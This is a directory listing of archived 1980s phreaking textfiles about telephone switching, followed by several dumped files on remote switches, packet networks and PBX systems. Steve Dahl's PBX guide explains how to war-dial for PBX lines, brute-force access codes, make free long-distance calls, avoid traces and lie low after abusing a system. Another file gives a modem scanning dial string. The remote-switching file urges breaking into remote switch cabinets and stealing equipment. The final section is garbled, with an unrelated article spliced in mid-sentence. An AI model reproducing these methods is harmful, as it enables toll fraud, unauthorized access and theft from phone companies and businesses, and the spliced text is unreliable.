=> gemini://informis.land/textfiles/phreak/SWITCHES/classnfo.txt [ 6049] Information on CLASS; Custom Local Area Signaling Services
=> gemini://informis.land/textfiles/phreak/SWITCHES/clss.txt [ 10240] A Comprehensive Look at Switching Systems by Terminus
=> gemini://informis.land/textfiles/phreak/SWITCHES/clss7.fea [ 15440] Custom Local Area Signaling Services (CLASS) information from Bell
=> gemini://informis.land/textfiles/phreak/SWITCHES/csdc.txt [ 5251] Circuit Switched Digital Capability by The Executioner of PhoneLine Phantoms
=> gemini://informis.land/textfiles/phreak/SWITCHES/d-multsy.txt [ 7698] Digital Multiplex System (DMS) 100 by Knight Lighting of the Metal Shop AE
=> gemini://informis.land/textfiles/phreak/SWITCHES/dms-100.txt [ 7613] Digital Multiplex System (DMS) 100 by Knight Lightning
=> gemini://informis.land/textfiles/phreak/SWITCHES/dms.txt [ 18152] Information on the DMS Switching System
=> gemini://informis.land/textfiles/phreak/SWITCHES/dms100.phk [ 7048] Digital Multiplex System (DMS) 100 by Knight Lightning
=> gemini://informis.land/textfiles/phreak/SWITCHES/dms100.txt [ 5273] The DMS-100, by Captain Hook
=> gemini://informis.land/textfiles/phreak/SWITCHES/dms100x.txt [ 6113] Information on the DMS-100x from Northern Telecom
=> gemini://informis.land/textfiles/phreak/SWITCHES/eqaccess [ 4569] Tests Start for Long Distance Equal Access Switching from Scan Man
=> gemini://informis.land/textfiles/phreak/SWITCHES/equal.phk [ 4603] Tests Start For Long Distance Equal Access Switching from ScanMan
=> gemini://informis.land/textfiles/phreak/SWITCHES/equal.txt [ 4522] Tests Start for Long Distance Equal Access Switching by Scan Man
=> gemini://informis.land/textfiles/phreak/SWITCHES/ess.phk [ 5085] The History of ESS By Lex Luthor
=> gemini://informis.land/textfiles/phreak/SWITCHES/ess.sys [ 7092] Electronic Switching System from 2600 Magazine (February 1984)
=> gemini://informis.land/textfiles/phreak/SWITCHES/ess.txt [ 5248] Electronic Switching Systems from 2600 (February 1984)
=> gemini://informis.land/textfiles/phreak/SWITCHES/ess1a.txt [ 10752] The Phreaker's Guide to ESS1 & 1A Switching Systems by Ninja Master (May 10, 1987)
=> gemini://informis.land/textfiles/phreak/SWITCHES/ess2.phk [ 7834] Electronic Switching Advances, from 2600 Magazine
=> gemini://informis.land/textfiles/phreak/SWITCHES/ess7.txt [ 5234] ESS 7 Is Out! By The Mortician and The Villain
=> gemini://informis.land/textfiles/phreak/SWITCHES/esshist.txt [ 5120] ESS History from The Lost City of Atlantis
=> gemini://informis.land/textfiles/phreak/SWITCHES/essinfo [ 8115] Electronic Switching Advances by 2600 Magazine (June, 1984)
=> gemini://informis.land/textfiles/phreak/SWITCHES/fccnews2.txt [ 11299] Free Local Acces to Packet Switching Networks May be Eliminated!
=> gemini://informis.land/textfiles/phreak/SWITCHES/hvco.nfo [ 5061] Signaling System 7, by High Voltage (July 31, 1994)
=> gemini://informis.land/textfiles/phreak/SWITCHES/mremsw.txt [ 10671] Information about Modern Remote Switching
=> gemini://informis.land/textfiles/phreak/SWITCHES/pac.txt [ 10356] the Ins and Outs of Packet Switching
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbx.phk [ 6451] PBX's (Private Branch Exchanges) and WATS, by Steve Dahl
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbx.sys [ 4829] Understanding PBX Systems by Brainstorm Elite
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbx.tap [ 2104] PBXes, by The Ghost
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbx.txt [ 7168] Private Branch Exchanges by The Sniper (August 8, 1986)
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbx1.txt [ 6313] PBX's (Private Branch Exchanges) and WATS by Steve Dahl
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbxchn.hac [ 5826] R.O.L.M. Sorcerer XII PBX Remote System Control by The Conflict
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbxhack.txt [ 5957] PBX Hacking Part I by Instinct (May 20, 1990)
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbxinfo.phk [ 5248] Private Branch Exchanges by The Sniper (August 8)
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbxs.txt [ 6128] PBX's (Private Branch Exchanges) and WATS by Steve Dahl
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbxscams.txt [ 3462] PBX Users Falling Victim to Determined Rip-Off Schemes!
=> gemini://informis.land/textfiles/phreak/SWITCHES/pbxsniper.txt [ 5079] Private Branch Exchanges by The Sniper (August 8, 1986)
=> gemini://informis.land/textfiles/phreak/SWITCHES/psnintro.txt [ 44004] The Complete Introductory Guide to Sprintnet and Similar Packet Switched Networks by DOctor DIssector (April 22, 1990)
=> gemini://informis.land/textfiles/phreak/SWITCHES/r2.txt [ 12973] Signalling Systems and The Blue Box Revamped by Lazlo (July 20, 1992)
=> gemini://informis.land/textfiles/phreak/SWITCHES/remote.txt [ 10697] Quick Overview of Remote Switching
=> gemini://informis.land/textfiles/phreak/SWITCHES/rsts3.txt [ 8829] Inside RSTS/E Volume III by the Maurander
=> gemini://informis.land/textfiles/phreak/SWITCHES/rsts4.txt [ 11880] Inside RSTS/E Volume IV by The Maurader
=> gemini://informis.land/textfiles/phreak/SWITCHES/rsts_oz.txt [ 14028] Making the Most of RSTS/E Systems by Captain Hack of Melbourne, Australia (February 1, 1986)
=> gemini://informis.land/textfiles/phreak/SWITCHES/s56.txt [ 6743] Explanation of Switched Digital Service 56 (SDS 56)
=> gemini://informis.land/textfiles/phreak/SWITCHES/secsig.phk [ 12186] Secret Signals, by Texas Star (Needs some Editing)
=> gemini://informis.land/textfiles/phreak/SWITCHES/ss7.txt [ 27364] Informaiton on Signalling System 7 (SS7)
=> gemini://informis.land/textfiles/phreak/SWITCHES/switch.txt [ 10500] The Phreaker's Guide to ESS1 & 1A Switching Systems by Ninja Master (May 10, 1987)
=> gemini://informis.land/textfiles/phreak/SWITCHES/tiaops.txt [ 10566] The Ins and Outs of packet Switching by The Seker of Tribunal of Knowledge (June 23 1986)
+176
View File
@@ -0,0 +1,176 @@
A bit about modern Remote Switching. With new remote technology, when a T1
een the CO and the remote gets fried, the remote can go into an
emergency mode and keep going. A fitting analogy would be between a PC and
a mainframe. When hooked up with the mainframe (the CO), the PC(the remote)
emulates the mainframe, but when the link is broken, (ie: the T1 gets
blasted) it can operate independantly and intelligently. Well, the remotes
today are bringing about a more fully distribted network, and some even have
trunking capabilites. Another plus with remotes is that they cut down the
length of the subscriber loop and are more cost-effective in urban areas.
Some speculate the the increased use of remotes will change the way the
network
is designed.
Another use of remotes is apparent in providing digital service to
sparsely
populated areas. Alcatel's E10-FIVE advanced digital CO can now be made
availlable through Alcatel's RSU (remote Switching Units) and RLU (Remote
Line Unit. The E10-FIVE is already a fully distributed, microproscessor
controlled architectur CO, including the RSU and RLU capabilities.
It consists of three major systems, each with computer and memory resources.
The PORT SUBSYSTEM, with line, trunk, and service circuits, and remote
interfacese. The Port Subsystem assists in call processing by performing
real-time functions such as digit reception, signaling, and line
supervision.
The CENTRAL MATRIX SUBSYSTEM consists of four independent non-blocking
planes. It provides the inter-connectivity for all elements of the
Port Subsystem and communication channels between the Port Subsystem
and Control Subsystem.
The CONTROL SUBSYSTEM is at the heart of the E10-FIVE. It consists of
TCUs(Telephony Control Units) and PCUs(Periphreal Control Units),
Central Matrix Controllers withen the Central Matrix and with termingal
unit microprocessors in the Port Subsystem.
The PCUs provide the system interface to peripheral maintenance and
administrative hardware such as Input/Output man-maching terminals,
hard disk drives, tape units, alarm panels, etc.
The TCUs are typically used for call processing, administration, or
spare provessors. Each TCU loaded with call processing software
serves its own group of line, trunk, and service circuits via the
Central Matrix and is referred to as a Supergroup. In essence, each
Supergroup is a Central Office with itself, and the PCUs act as their
network maintenance and administration center.
Back to RSUs and RLUs, The Alcatel E10-FIVE RSU contains modules that are
identical to the host CO, are extensions of the host Supergroup. The RSU
is really a CO capable of handling up to 1600 subscribers. Its is connected
to the host CO by two to eight T1 lings. On the T1 Lings, there are two
clear 64 kilobit channels that use X.75 protocol for control, maitenance,
administration data, etc. Each RSU also has two TCUs, and dual
plane non-blocking Central Matrix, tone generator, and MF/DTMF service
circuits and digital trunks. The RSU is capable of handling trunks to an
exchange other that the host, which takes care of back hauling traffic
through the main CO. It (the RSU) processes calls locally and
maintains the same level of diagnostics and maintenance as the host system.
As new software is implemented into the host CO, they are automatically
downloaded to the RSU, this saves the cost of multiple updates to the
CO generics.
When all lings between the E10-FIVE and the RSU are down, RSU subscribes
retain all calling servieces except three-way calling and call forwarding.
The traffic which normally be sen to the host CO through the T1 links
would be lost. However, local intra-RSU traffic is maintained. This means
that if contact is lost with the host CO, the RSU can still handle calls
between subscribers that it sevices.
Memory is allocated in the TCU for storing alarm, traffic and other
relevant data for a period time after the ling failures.
The Remote Line Unit(RSU) is a scaled down version of the RSU (to
put it simply). It is a remote subscriber concentrator and can serve
up to 400 lines. It contains software (not wares you idiot!) identical
to the E10-FIVE main unit and RSU, both of which can act as a host to an
RLU. It is connected to the host through two to four T1 links.
Like the RSU, the number of links between the RLU and the host is based
on traffic requirements. Unlike the RSU, the RLU requires two voice
channels for each intra-RLU call. Two clear 64-kilobit channels are also
utilized on these links for control, maintenance, and administration data.
Basically the E-10FIVE is a perfect example of the importance of
how remotes can modernize the network. I'd also like to take a look at
other manufacturers of computerized "distributed" architecture.(you'll
have to wait just a little while longer for the 'k-k00l' stuff)
One vendor, Stromberg-Carlson, has past history of serviceing rural areas.
S-C has an impressive lineup of remote switching equpment. Starting with the
90-line Remote Line Group, moving through the 1,080-line Remote Line Switch
and topping off with the 8,000 line Remote Network Switch. Stromberg's
remotes supply all of the host system DCO (Digital Central Office) features.
Strombergis putting the finishing touches on its DCO product line. The
Remote Line Switch(RLS) was introduced in 1982, and the Remote Line Group
(RLG), in early 1986. The top of the line Remote Network Switch(RNS), is
only now becoming available.
In the area of survability, the RNS maintains all features of the host,
even if the link is severed. The RLS, will lose most features except
POTS, coin DTMF, and mult-line hunt features. The RLG loses all
features as it has no switching capability of its own, and is just a
line concentrator.
The RNS can switch calls directly to the public network without
sending traffic through the host switch. The call handling capacity
of the host is conserved, and is an important step toward a truly
distributed network. In the S-C DCO environment, each switch acts
as a "host" for each of the smaller switches. For instance, a 1000-line
RLS, can be connected to the RNS and another 80-line RLG can then be
dropped offf the RLS. In these instances, the capacity of the host is
diminished. ie: The RNS may only handle 8,000 lines, whether the
lines are direct subscriber or served from smaller remote switches
or line groups.
All the S-C remotes support T1 interfacing. In addition, the Remote
Line Switch will support an interface to fiber-optic trunking.
The Stromberg remotes all support remote diganostic, outside plant testing,
and AMA/traffic data collection. Stromberg has three main reasons why
its DCO central offices along with the remotes are good purchases for
telecos: They cut costs by making the switch more efficient, increase
the flexability of the network, and help reduce the length of the
subscriber loop in preparation for ISDN and other adavanced services.
Northern Telecom's remotes extend full capability of the Dynamic Network
Architecture beyond the immediate area of the host switch with a family
of five remotes: the Remote Switching Center(RSC), the Extended Remote
RSC), the Remote Line Concentrating Module(RLCM), the Outside Plant
Module(OPN), and the new Large Business Remote(LBR).
The Remote Line Concentrating Module is connected to a host Line Group
Controller(LGC), or to a Remote Switching Center(RSC), through mazimum of
sic DS-1 links. It can terminate up to 640 lines, ie: 10 line drawers of
64 lines each. Maximum traffic capacity at six host links is approximately
4,700 CCS. The unit may be placed up to 100 miles away from the host office
at 0db loss.
The Outside Plant Module is an RLCM repackaged into an environmentally
controlled cabinet. The cabinet includes environmental controls, cross-
connect field, power, and battery backup.
The Remote Switching Center consists of up to 9 LCMs that are located at
a remote site and controlled by a Remote Cluster Controller (RCC), which
is an LGC based DMS-100 peripheral. The RCC connected back to its host
DMS-100 through 2 to 16 DS-1 links.
The total max. capacity is 5,760 lines (9 x 640). Traffic capacity
of the RSC is approximately 15,000 CCS, ie: 5,000 lines at 3 CCS/line or
2,000 lines 7.5 CCS/line.(you following me so far?)
All line features of the host LCM and the RLCM are supported by the RSC,
including POTS and IBN stations, attendant consoles, IBN business sets,
Datapath, etc.
The Extended Remote Switching Center is a form of the RSC to provide
a remote larger that a single RSC. Junctors will interconnect the control
sides (C-sides) of the RSCs, where 16 24-channel C-side ports are
available on each RSC for the junctors and/or host links. This will result
in a single large traffic group that provides trunking efficiencies between
the host and remote.
There are many benefits to the XRSC including, larger RSC configurations,
periperal ports, etc, etc, etc...
Ok, There are also Siemens, GTE, AT&T, etc remotes, but I just realised
it would take me another 80 sectors to cover them all, so I for now I will
stop. The remaining specs will be released in a suplemment...
The Benefits of playing with remotes:
Well, if your area is serviced by a remote, you actually have an unguarded,
mini-switching station to play with. Usually they will be locked up, so it
will require some bashing, but it's well worth it. I recomend either
taking interfaces, large portions of the remote, or the whole damn thing!
There will also surely be manuals and equipment sitting around for you...
======------======------======------======------======------=======------======
NOTE:
We are currently looking for the author of Tap.Interviews II, this file was
completely unauthorized by us and filled with lies. Obviously the author
was extremely mis-informed. We don't wish to 'get revenge', but we'd like
to know what kind of demented mentality would do this.
ALSO:
CEO is now looking for people to put up Elite CEO boards. We plan to set up
a network of CEO boards (you don't have to be in CEO). If you're
intrested, please leave mail to "Executive Hacker" on Draco Tavern
(707-745-5805). Full Validation is Automatic so we are using it as a mail
drop.
The First CEO Board will be "The Providence" at 505-294-8466, details
are still being worked out.
+217
View File
@@ -0,0 +1,217 @@
==)--- P TO PAUSE S TO STOP ---(==

[][][][][][][][][][][][][][][][][][][]
[] []
[] THE INS AND OUTS []
[] OF []
[] PACKET SWITCHING []
[] []
[] by: The Seker []
Tribunal of Knowledge! []
[][][][][][][][][][][][][][][][][][][]
[] Written (c) June 23, 1986 []
[][][][][][][][][][][][][][][][][][][]
'TRIBUNAL COMMUNICATIONS LTD'
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Not many people are quite aware how complex packet switched networks are.
In this file I hope to clear up all confusion and answer all questions
concerning packet switching and making international datacalls via packet
switched networks.
HISTORY
=======
Using normal phone lines, computers can only transmit data at speeds up to
1200 bps efficiently. This is very slow compared to the inner workings of even
the slowest computer. If computers could transmit across phone lines at higher
speeds, 9600 bps for example, there would still be the problem of using a
compatible protocol. Packet switched networks take care of these and other
problems dealing with communications.
The idea of developing a completely computerized network for computers was
first discussed in the mid 1960's..probably someplace like Bell Labs, MIT, or
the like. But it wasn't until a decade later that the theory was put into
construction.
The first packet network was a project of the Defense Department. They
labeled it ArpaNet. It was and still is a boon for advanced hackers, as it is
host to over 300 government related computers. (See 'Hacking ArpaNet' written
by the Wizard of ArpaNet for an indepth look at breaching this system.)
Today there are over five commercial packet networks in the United States
alone (Telenet, Tymnet, CompuServe, etc), and many more throughout the world.
HOW IT WORKS
============
In essence, packet switching services operate at 4800 bps full duplex
(both direction simulstaneously) and use a form of TDM (Time Division
Multiplexing), a transmission which is basis for most of the world's voice
communications. Transmission streams are separated into convenient sized
blocks or 'packets', each one of which contains a head and tail signifying the
origination and destination of the data. The packets are assembled by either
the originating system or by a special facility supplied by the packet switch
system. Packets in a single transmission may follow the same physical path
(same cable) or may use an alternate route (ie. a detour cable) depending on
the congestion of the system. The packets from one 'conversation' are very
likely to be interleaved with packets from other 'conversations'. The
originating and receiving computers see none of this mixing. At the receiving
end, the various packets are stripped of their routing information, and
re-assembled in correct order before presentation to the computer terminal.
All public networks that use packet switching have installed a standard
protocall to try and be compatible with each other. (good luck) The standard,
which is called CCITT X.25 (Developed at the Geneva conferences.), is
implemented on all international datacalls. This is a complex system for
interface between data terminal equipment and data circuit-terminating
equipment.
ACCESSING
=========
Users (hackers) can access packet switching in a variety of ways. Special
terminals called Packet Terminals, which are usually hard wired to the nearest
PSS (Packet Switch Stream), that are able to create and arrange data into the
correct format are often used. This is very expensive, a reason why you will
only be likely to see these type of terminals within large company office
buildings. The average person will probably access a packet network using an
ordinary ascii terminal (computer and modem), and connect to a special PSS
facility called a PAD (Packet Assembler/Disassembler) which will handle the
formatting for them.
USING
=====
To use a public packet network it is usually required for one to have a
NUI (Network User Identity) which is registered at your local PSE (Packet
Switch Exchange) for billing purposes...or a way around this.
Dial into your local PAD (often called port) and enter your NUI. If a
valid ID is not given, the port will usually throw you off. (There are a few
exceptions which we will discuss later.) Then one enters the NUA (Network User
Address) or call name of the computer he/she wants to access. Each computer on
a network has one given to them. This is usually in the form of numbers or
somtimes letters. (As in Tymnet's case.) After the correct information is
entered, the network will connect you via its private sattelite system to the
local phone system of your destination and then onto the computer you wish
to access.
BILLING
=======
Billing on networks is done to either the user or reversed and charged to
the designated computer. Charging is not done according to the distance of the
call or by the time passed, rather by how many packets exchanged and sometimes
a small fee for CPU (Centeral Processing Unit) time.
Many packet networks do not require you to have an NUI at all. One of
these that many of you probably have worked with is Telenet. It is a leading
public network throughout the continent. Billing on there is a variation of
the norm. There is only a charge to a user when he/she wants to access a
computer internationally or one which doesn't accept the charges of the
datacall. (ie. REFUSE COLLECT CONNECT 00 AA) Billing like this will probably
disappear soon due to the greed of big business.
INTERNATIONAL DATACALLS
=======================
If a person wishes to call a computer located on a foreign network, there
is a little procedure which must be done. As I said earlier, each computer on
a network has its own address. (NUA) Networks also have their own 'address',
which is called a DNIC. (Data Network Identification Code) This code is four
numerical digits long. The first three numbers in this code represent which
country the network is located in. The fourth digit is which service in that
particuliar country, as some countries have more than one network. (For
example, 5052 is Australia's Auspac DNIC. 505 is the country code. 2 is the
service code.) A list follows:
COUNTRY NETWORK DNIC
-------------------------------------------------------
Australia Auspac 5052
Australia Midas 5053
Belgium Euronet 2062/2063
Canada Datapac 3020
Canada Globedat 3025
Canada Infoswitch 3029
Denmark Euronet 2383
France Transpac 2080
France Antilles Euronet 3400
Germany (West) Datex P 2624
Germany (West) Euronet 2623
Great Britain IPSS 2342
Hong Kong IDAS 4542
Irish Republic Euronet 2723
Italy Euronet 2223
DDX-P 4401
Japan Venux-P 4408
Luxembourg Euronet 2703
Netherlands Euronet 2043
Norway Norpak 2422
Singapore Telepac 5252
South Africa Saponet 6550
Spain TIDA 2141
Sweden Telepak 2405
Switzerland Datalink 2289
Switzerland Euronet 2283
USA Autonet 3126
USA CompuServe 3132
USA ITT (UDTS) 3103
USA RCA (LSDS) 3113
USA Telenet 3110
USA Tymnet 3106
USA Uninet 3125
USA WUI (DBS) 3104
As you can see, the the United States has many services. But their DNIC
doesn't follow the pattern I described earlier. (ie. first three digits
represent country, last is service) I am not quite sure why this is, but I
think it may be because each of the US services listed are privately owned.
As I was saying earlier, there is a little extra bit of information you
must give the network when making an international call. Instead of just
emtering the NUA like on a domestic call, you have to enter the DNIC and append
the NUA or you will not complete you call and probably will get an error code.
Here is what a call from Telenet to Cambridge University's port selector in
England, which is located on Euronet (In Britain they call it IPSS.) would
look like:
TELENET
714A
TERMINAL= d1
@ ID EXAMPLE
PASSWORD?
ID VALID
@ c 234222339399
CONNECTED TO 234 222339399
What I just did was connect to a Telenet port. Enter my NUI. Then enter
the DNIC for IPSS in Britain (2342) and appended the NUA for Cambridge
University. (22339399) Then I was connected.
REFERENCES
==========
For more detailed info on packet switching and its uses, etc, I recommend
the following two books:
'Data Communications: Facilities, Networks, and Systems Design'
Doll, Dixon R., New York, Wiley, c1978
'Packet Radio'
Rouleau, Robert and Ian Hodgson, Blue Ridge Summit, Pa., Tab Books, c1981
ACKNOWLEDGEMENTS
================
Much of the imformation within was provided by:
Cyclone II
Slave Driver
NOTE: This document was written for informational purposes only. Any
application of what was provided within is responsibility of the user, not the
author.
>>>>>>>>>>>>>>> (c) 1986 TRIBUNAL OF KNOWLEDGE! <<<<<<<<<<<<<<<
DOWNLOADED FROM P-80 SYSTEMS.....
+102
View File
@@ -0,0 +1,102 @@
File: PBX'S & EXTENDERS
Read 31 times
PBX's (Private Branch Exchanges) and WATS
By Steve Dahl
Because of the danger of using a blue box, many phreakers have turned to MCI,
sprint, and other SCC's in order to get free calls. However, these services are
getting more and more dangerous, and even the relatively safe ones like
metrofone and all-net are beginning to trace and bust people who fraudulantly
use their services. However, (luckily), there is another, safer way. This is
the local and WATS PBX.
There will at least 1 line going out of the PBX to the telco set up for
outgoing calls only, and there will also be at least one incoming line to the
switchboard. This is what we are interested in. Some of the incoming lines are
always answered by the switchboard operator, but some will be answered by the
PBX equipmemt. It will usually answer with a dialtone, the tone will sound
different for different systems. Some even answer with a synthesized voice!
(These are very hard to find, though.) The ones which answer with a dialtone are
easy to find if you have a modem or hardware device which can "hear" what's
going on on the phone line.
To find these fun thingies, you will have to write a scanner program which
will dial each number in a pre- fix, either sequentially or in a random order,
it really doesn't matter, and "listen" on the line for a constant sound longer
than the normal length of a ring. This could be done manually but it would take
a hell of a long time. Whenever the program finds a number that makes a
constant tone longer than a ring, it should record the number in an array or
something. Now, this number can be one of a few things. A noisy answering
machine, a sprint, MCI, etc access node, a person who yells in the fone, the
tone side of a loop (nice), possibly a carrier if your modem can "hear" tones
that high, or, hopefully, a PBX line. All your scanning should be done between
6 PM and 7 AM because between 7 AM and 6 PM, many of these numbers will be
answered by the switchboard operator. When you are checking out your results
the next day and come accross a dialtone, enter some touch-tone (TM) digits.
Depending on which type of PBX equipment and the length of the codes, after 3-8
digits it should either give a busy signal, a "reeler tone" (high-low tone), or
hang up on you, or possibly tell you you entered a bad code. Now it is time to
write a hacker for this PBX. If the codes are 3 or 4 digits, there will most
likely only be one code, but if they are 5 or more digits there may be more than
one. If there are 3 or 4, your hacker should dial the access number, wait for a
dialtone, then dial the digits and wait for a second, then dial a "1" (the
reason for this will be explained shortly), and then "listen" for a dialtone.
This would be a hacker for a system that gives a reeler tone, listening for the
dial- tone and hearing it would really mean the presence of the reeler tone and
mean that a bad code had been entered. The reason 1 is entered is to "quiet"
the dialtone" If it was a good code, 1XX or 1XXX will be valid extentions on
practically all PBX's. If your system gives a re-order or hangs up after a bad
code, forget the one and just listen for a dialtone, this will be a good code.
If there are 3 or 4 digits, they should be tried sequen- tiallly (becuase there
will probably only be one good one), if there are more, take your pick between
random and sequental. Now, when you (finally!!) get a good code, you will call
the number and enter the code and be confronted with a second dialtone. THIS IS
THE EXACT SAME DIALTONE THAT ANYONE WHO PICKS UP A PHONE IN THAT PBX SYSTEM
GETS. The reason this is important is because if they want to make an out-
going call, they will usually pick up the fone and dial 8, 9, or sometimes 7,
and get another dialtone and then make their call, local or long distance. And
you can do the same thing right now! These numbers also make a good tool to
avoid being traced on telenet, etc, it will just be traced back to the company
which owns the PBX.
Now for some phun with the PBX you have just broken into to. You can dial all
extentions directly on it (which is what local PBX'S are primarially used for
legitimately, unless the com- pany has OUTWATS lines.) The most phun extention
of all is the PA system. On some of these, you can get on the PA (intercom) and
actutually talk over it from your house! It can be on almost any extention
though, so you may have to hunt for it. On some, 797 or 1234 used to work, but
those have mostly been eliminated, not due to phreakers but because people
inside the company were figuring them out and using them!
Some PBX's don't even have security codes, you can just call up and dial 9 and
call wherever you want. On a few that I know of you enter the number and then
the code. If you want to know what these systems "sound" like, there are files
on this and other systems with long lists of WATS PBX numbers. The local ones
are much safer to hack though because you are not making a whole bunch of 800
calls which tends to get bell very pissed. Also, I have actually found modems
and other wierd things on some exchanges of PBX's, it might be worthwhile to
scan the numbers inside the PBX once to see what you find.
An important safety note: if you heavily abuse a TBX and make many outgoing
calls on it, after a few weeks (or whenever their fone bIll shows up!) it is a
good idea to lay off of it for a couple of months or so because they could get a
trace on it easilly, just like 800's. They will usually just change the code,
though. One more interesing note, I once found a PBX which had a direct link-
up to sprint! So by dialing 8 I got a line to sprint, no access codes, just
area code and number. It's phun to phuck up sprint and have them not know who
the hell you are or where the hell you are!!
If you have any comments, suggestions, corrections, or questions, leave
e-mail to Steve Dahl on any major phreak board, I will be happy to reply.
Steve Dahl
5/1/84
This phile is copyrighted 1984 by Steve Dahl and is not to be re-posted
without the author's consent! And I'm not kidding!!
[Courtesy of Sherwood Forest ][ - (914) 359-1517]
Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open

+97
View File
@@ -0,0 +1,97 @@
/-/ Understanding PBX Systems /-/
Presented by Brainstorm Elite
------------------
Computer Based PBX
------------------
To get a better understanding of what a PBX can do, here are a few basic
fundamentals. The modern PBX is a combined computer, mass storage device, and
of course a switching system that can:
{1} Produce itemized,automated billing procedures, to allow the
identification and management of toll calls.
{2} Combine daytime voice grade communication circuits into
wideband data channels for night time high speed data transfers.
{3} Handles Electronic Mail {including office memos}.
{4} Combine Voice channels into a wideband audio/visual conference
curcuit, with the ability to xfer and capture slides, flipcharts, pictures
of any kind.
Both the external and internal calling capacity of the PBX System must be
carefully considered because many business operations run a very high ratio of
internal station to station dialing and a low capacity system will not handle
the requested traffic load.
A critical factor is the number of trunks and the Central Office Facilities
that are used for outside connections. Another is the number of junctions or
{links} that make up the internal calling paths.
To understand the services available on a typical computer run PBX it is
necessary to introduce the subject of time division switching. In a time
division switching network all connections. Called (of course) a
time-division bus.
Every line trunk that requires a connection with another is provided
with a port circuit. All port circuirs have access to the time division bus
through a time division switch.
[When two ports require connection,their time division switches operate at
a very high frequency (16,000 times per second). This technique, which is
called 'speech sampling', allows many simultaneous connections over the same
time division bus.
The next critical item is circuit PACKS. The system elements that we will be
describing in future tutorials {lines/trunks/switches,memory and control} are
contained on plug in circuit packs. Each line circuit pack contains a number
of lines, in example, four. But tha assignment of station numbers to actual
phone line circuits is flexible.
The system memory is contained in circuit packs which provide the call
processing functions. The circuit packs are held in small frames called
'carriers'. Within each carrier, the circuit packs are plugged into positions:
the 'slots'. Every circuit can be addressed by, say a five digit number which
tells its location by carrier-slot-circuit.... {starting to get the idea?}
There can be three types of carriers in a modern PBX system:
o Line Carriers
o Trunk Carriers
o Control Carriers
The line carriers contain station lines. In AT&T's "Dimension" model, for
example, a total of 52 to 64 lines are provided. The trunk carriers contain
slots for 16 trunk circuit packs. The control carrier includes processor,
memory, contvol circuitry, data channels for attendant console control and
traffic measurement outputs.
PBX Systems will directly reflect the types of services offered at the C.O.
o CCSA
o CCIS
o Picturephones {sooner than you tlink my phriends}
Common Control Switching Arrangements ( CCSA ) permit any unrestricted tele-
phone station to call any othet internal or external system station by using
the standard seven digit number. Alternate routing is a feature of CCSA service
The interfacility, alternate routed calling paths are accomplished at the
telephone company central office level, not at the PBX level.
A system of interest to large scale telephone users is Common Channel Inter-
office Signalling (CCIS). Ty0ically, this technique employs common channels to
carry all interfacility signalling instructions: dial pulses, on hook (idle),
off hook (busy), and so on, between two switching centers. { getting warm }.
CCIS replaces older methods of interoffice signalling such as 'in band' and
'out of band' techniques. By the way, real phreaks are selling their boxes
to idiots who still think the're worth a lot...The former (in band) transmits
signalling data within the normal conversation bandwidth. It's shortcoming is
that false information may be transmitted due to unique tone or noise
combinations set up in the talking path. {this is the official reasoning}
Out of Band signalling techniques placed the interoffice data in special
channels, generally adjacent to and immediately above the voice path. To pre-
serve interchannel integrity,out of band signalling requires very effecient
filtering or greater 'band guard' seperation between channels.
** Brainstorm Elite 612-345-2815 **
+45
View File
@@ -0,0 +1,45 @@
pppp bbbbb x x
p p b b x x
p p b b xx
pppp bbbbb xx
p b b x x
p bbbbb x x
PBX - Public Branch eXchange
For all you new phreakers that are vocabularized real well that's the
formal definations......and for those that know what their doing it's
your best phriend.....
A PBX is no more than a phone line leading into a little box with about
10 lines coming out of it.....Most PBX's are located inside big businesses
such as doctor's office, banks, and other type of important places that
have large masses of people calling in....
You will realize when you dial a PBX 'cause you will get a ring or a beep
then drop directly into a dial tone....DO NOT MISTAKE THIS FOR IT HANGING UP.
Most PBX'S are usually easy to scan for and use....The normal PBX's just
requires a 9 before you can outdial....But then you hit a wierd one that
requires you to enter anywhere from 4-6 code before allowing you access....
First of all the easiest way to scan for PBX's would be to set up a
scanner that will dial something like this 'atdt yyy-yyyy,,,9,xxx-xxxx' where
'yyy-yyyy' is the number you're scanning and 'xxx-xxxx' is a local nuber
that you ALWAYS recieve a carrier.....this way when you wake up just see
what you connected to and dial and check them out.....there is no other
way of scanning for PBX's unless you just sit there and listen to each number
that you dial out....
I hope this gives you new phreakers something to do next time you're
wondering where you're going to leech wareZ from.....Ok this covers what
you should need to know about PBX's......HAVE PHUN....
Typed by
tHe gH0st
^^^^^^^^^
at 1:00 in the damn morning!
+203
View File
@@ -0,0 +1,203 @@
File: PBX'S & EXTENDERS
Read 31 times
PBX's (Private Branch Exchanges) and WATS
By Steve Dahl
Because of the danger of using a
blue box, many phreakers have turned
to MCI, sprint, and other SCC's in
order to get free calls. However, these
services are getting more and more
dangerous, and even the relatively
safe ones like metrofone and all-net
are beginning to trace and bust people
who fraudulantly use their services.
However, (luckily), there is another,
safer way. This is the local and WATS
PBX. If you have a modem or inte around with the menus for
other options.
--------------------------------------------------
Dunn and Bradstreet:
Do they know something that we don't?
by Tuc TucBBS & BIOC Agent 003
In issue #90, we explained how to use the
Dunn and Bradstreet system (Which is now known
as DunSprint). As usual, our information was
totally correct. A week after the issue was
mailed, a phellow phreak found out that a copy of
the issue had fell into the (lots of
PHUN!) There will at least 1 line
going out of the PBX to the telco set
up for outgoing calls only, and there
will also be at least one incoming line
to the switchboard. This is what we are
interested in. Some of the incoming
lines are always answered by the
switchboard operator, but some will be
answered by the PBX equipmemt. It will
usually answer with a dialtone, the
tone will sound different for different
systems. Some even answer with a
synthesized voice! (These are very hard
to find, though.) The ones which answer
with a dialtone are easy to find if
you have a modem or hardware device
which can "hear" what's going on on
the phone line.
To find these fun thingies, you
will have to write a scanner program
which will dial each number in a pre-
fix, either sequentially or in a random
order, it really doesn't matter, and
"listen" on the line for a constant
sound longer than the normal length of
a ring. This could be done manually
but it would take a hell of a long
time. Whenever the program finds a
number that makes a constant tone
longer than a ring, it should record
the number in an array or something.
Now, this number can be one of a few
things. A noisy answering machine, a
